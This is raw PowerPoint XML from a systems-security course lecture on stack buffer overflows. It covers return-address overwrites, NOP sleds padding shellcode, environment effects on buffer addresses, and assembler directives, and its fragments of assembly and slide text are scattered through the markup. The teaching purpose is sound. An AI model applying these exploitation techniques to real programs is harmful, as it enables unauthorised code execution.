              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1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869287-4675-4041-8DAB-425E2B8670E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4855029"/>
            <a:ext cx="10515600" cy="113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err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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,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endParaRPr lang="en-US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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov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, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1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5F70A1-BA5C-B44D-A6D1-7738351D7517}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444343" y="1863121"/>
            <a:ext cx="4909457" cy="1205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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov $0x4141,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endParaRPr lang="en-US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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lea -$0x4141(%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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>), %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1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14517A4-9273-1FD1-AADA-A4C7261202D3}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4327920" y="34203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14517A4-9273-1FD1-AADA-A4C7261202D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8560" y="34110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9579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146F2D-2344-D643-AF36-316D457B7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839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32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7F00DE-3CF4-C043-B5B2-D876EAAC62E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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 spc="-50" normalizeH="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Cambria"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> sled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6DE485-F967-514B-99A1-DDE9EB3D3C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371601"/>
            <a:ext cx="4419600" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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i="1"/>
              <a:t>WARNING:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Environment changes address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$ OLDPWD=“” ./vuln </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>vs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$ OLDPWD=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>aaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>” ./vuln</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EC786CA-0099-0844-AF56-A9FCA3BAB5BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="5181599"/>
            <a:ext cx="4816979" cy="1311275"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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400"/>
              <a:t>PROTIP: Inserting NOP’s (e.g., 0x90) into shellcode allow for sled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DF0F146-2026-B54F-AB0A-4B8B5BA24497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8458200" y="1096428"/>
          <a:ext cx="1461558" cy="46651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env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argv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argc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return</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline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aseline="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>addr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caller’s </a:t>
                      </a:r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ebp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717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argv</a:t>
                      </a:r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[1]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B7138C05-2B8F-8D4D-B032-333E747BDC44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6496082" y="2131480"/>
            <a:ext cx="1600200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64078"/>
              <a:gd name="adj2" fmla="val -804"/>
              <a:gd name="adj3" fmla="val 16667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Overwrite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with any position in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sled ok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242D18D-40A1-FB47-9184-C19F8A2B9011}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6496082" y="3319320"/>
            <a:ext cx="3423676" cy="1707760"/>
            <a:chOff x="4876800" y="3702440"/>
            <a:chExt cx="3423676" cy="17077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610A08-B695-EB46-A4B9-D1C711BBB835}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6838918" y="4480120"/>
              <a:ext cx="1461558" cy="9144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0x90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...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0x90</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Left Brace 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CEB8CCC-2F50-C749-9BB6-94EC485701CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6324600" y="4495800"/>
              <a:ext cx="381000" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln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ular Callout 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D682B6D-C3A0-9D4F-AE3F-F193B8BCEE9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4876800" y="4800600"/>
              <a:ext cx="1219200" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 74365"/>
                <a:gd name="adj2" fmla="val -23953"/>
                <a:gd name="adj3" fmla="val 16667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/>
              <a:r>
                <a:rPr lang="en-US" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>nop</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> sled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8018A2-30DE-FF4E-BE61-CC781FAFEA16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6838918" y="3702440"/>
              <a:ext cx="1461558" cy="7620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/>
              <a:r>
                <a:rPr lang="en-US" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>execve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867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373C5-6DB6-3C45-B88F-922E039D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Running Shellcode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EFE1A-B0F9-D24C-A439-521566740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Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Requires an exact address of a shellcode…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BD6043-02DE-0440-A711-F62E9B0F654E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9217676" y="2067313"/>
            <a:ext cx="1764649" cy="496111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F6F8E2-3BFA-BF43-885A-2CC2B497C791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6543675" y="2067312"/>
            <a:ext cx="2674002" cy="496111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SHELLCODE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A8EA41-0A76-CD4A-826F-57975AA2CF89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1072807" y="2067312"/>
            <a:ext cx="5463868" cy="496111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47B924-A9F2-CC42-A660-41DCA267C1CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6543675" y="1228725"/>
            <a:ext cx="0" cy="81430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DFB6F5E-2EB3-CB41-B5EC-03A0AAA20F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6443663" y="885825"/>
            <a:ext cx="3366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Return to here executes shellcode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C8F8534-EEB2-9848-9F6C-F38103650DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5295900" y="2563423"/>
            <a:ext cx="0" cy="68936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DF7873D-539A-9A46-A2FA-4BEBE2EE5128}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5063931" y="3312792"/>
            <a:ext cx="59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Fails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C3A1FC8-B3A6-8548-A252-FDB78273EDA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7448550" y="2587706"/>
            <a:ext cx="0" cy="68936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8B6AEC2-976B-3B4F-B29B-3C963E2560F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7216581" y="3337075"/>
            <a:ext cx="59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Fails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2608C7F-875B-DF44-96B3-312C7277E5C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121531" y="2067312"/>
            <a:ext cx="0" cy="5203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8A65D0-6894-9646-BA5E-2827A6A5F2AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3718731" y="2067312"/>
            <a:ext cx="0" cy="5203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F4B6DC3-0749-5742-8248-1F2C719E5DEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2343531" y="2067312"/>
            <a:ext cx="0" cy="5203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14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373C5-6DB6-3C45-B88F-922E039D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NOP-sled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EFE1A-B0F9-D24C-A439-521566740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Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An instruction that does nothing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Opcode is 0x90 (non-ascii 😂)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BD6043-02DE-0440-A711-F62E9B0F654E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9217676" y="2067313"/>
            <a:ext cx="1764649" cy="496111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F6F8E2-3BFA-BF43-885A-2CC2B497C791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6543675" y="2067312"/>
            <a:ext cx="2674002" cy="496111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SHELLCODE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AEB093-1CA1-4149-AF6A-E32A4EA24EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3094515" y="2064516"/>
            <a:ext cx="3449159" cy="496111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NOP Sled (full of 0x90s)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BDAC18-C6F5-5842-9237-7E506138387C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1322865" y="2064629"/>
            <a:ext cx="1764649" cy="496111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47B924-A9F2-CC42-A660-41DCA267C1CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6543675" y="1228725"/>
            <a:ext cx="0" cy="81430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DFB6F5E-2EB3-CB41-B5EC-03A0AAA20F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6443663" y="885825"/>
            <a:ext cx="3366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Return to here executes shellcode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C8F8534-EEB2-9848-9F6C-F38103650DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7267575" y="2573419"/>
            <a:ext cx="0" cy="68936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DF7873D-539A-9A46-A2FA-4BEBE2EE5128}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7035606" y="3322788"/>
            <a:ext cx="59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Fails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EF4E538-1825-B84C-9C78-342D061D04F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10041810" y="2573419"/>
            <a:ext cx="0" cy="68936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D5C3D46-7A74-E047-85C3-CFD1446E2900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9809841" y="3322788"/>
            <a:ext cx="59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Fails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8F4BBA3-C4C1-DA42-9A2F-07845820DAF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5281612" y="1171575"/>
            <a:ext cx="0" cy="81430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CCFD674-D321-6B48-8A9B-E367636117A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667250" y="1171575"/>
            <a:ext cx="0" cy="81430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BDB0321-1A71-C343-825F-B0F3D06C8429}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3995738" y="1171575"/>
            <a:ext cx="0" cy="81430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8807937-F59F-4743-92EB-1068A74680F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5824537" y="1171575"/>
            <a:ext cx="0" cy="81430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63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373C5-6DB6-3C45-B88F-922E039D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NOP-sled Trick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EFE1A-B0F9-D24C-A439-521566740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>
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SHELLCODE = “\x90” * 500 + SHELLCODE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Return to anywhere at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-sled (sized 500 in this case) will let you run the shellcode!</a:t>
            </a:r>
          </a:p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BD6043-02DE-0440-A711-F62E9B0F654E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9217676" y="2067313"/>
            <a:ext cx="1764649" cy="496111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F6F8E2-3BFA-BF43-885A-2CC2B497C791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6543675" y="2067312"/>
            <a:ext cx="2674002" cy="496111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SHELLCODE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AEB093-1CA1-4149-AF6A-E32A4EA24EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3094515" y="2064516"/>
            <a:ext cx="3449159" cy="496111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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NOP Sled (full of 0x90s)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BDAC18-C6F5-5842-9237-7E506138387C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1322865" y="2057429"/>
            <a:ext cx="1764649" cy="496111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752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53ED9-1E47-BF4C-B0FC-9973614F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ffectLst/>
              </a:rPr>
              <a:t>Useful Assembler Directives for GNU Assembler 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9A329-E1FB-3441-A649-250DF36B2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67250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
              </a:rPr>
              <a:t>Assembler directives have nothing to do with assembly language </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto"/>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
              </a:rPr>
              <a:t>Are used to tell assembler to do something </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:effectLst/>
              </a:rPr>
              <a:t>defining a symbol, change sections, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
              </a:rPr>
              <a:t> directive switches current section to the .text section </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:effectLst/>
              </a:rPr>
              <a:t>usually going into flash memory</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
              </a:rPr>
              <a:t> directive switches current section to the .data section </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:effectLst/>
              </a:rPr>
              <a:t>will be copied to RAM</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>rodata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
              </a:rPr>
              <a:t> if you wish data to be copied to SRAM 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199938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2373</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>477</Paragraphs>
  <Slides>36</Slides>
  <Notes>19</Notes>
  <HiddenSlides>3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gg mono</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Fira Code</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CS 6332.001: Systems Security and Malware Code Analysis Week 04</vt:lpstr>
      <vt:lpstr>Unit 2</vt:lpstr>
      <vt:lpstr>Unit 2</vt:lpstr>
      <vt:lpstr>How to Solve Unit2?</vt:lpstr>
      <vt:lpstr>From Previous Class</vt:lpstr>
      <vt:lpstr>Today’s Class</vt:lpstr>
